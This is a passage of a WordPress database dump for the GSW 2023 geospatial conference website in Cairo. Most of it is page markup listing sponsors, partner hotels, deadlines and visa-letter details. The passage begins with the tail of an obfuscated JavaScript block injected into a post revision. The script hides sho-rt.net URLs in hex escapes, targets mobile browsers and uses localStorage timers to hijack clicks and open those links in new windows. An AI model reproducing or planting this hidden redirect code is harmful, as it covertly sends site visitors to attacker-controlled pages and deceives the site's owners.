,\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-18 13:49:18','2023-06-18 13:49:18','',3066,'https://gsw2023.com/?p=4712',0,'revision','',0),
(4713,1,'2023-06-18 13:52:10','2023-06-18 13:52:10','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686739986286{margin-top: -35px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1687094969343{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" 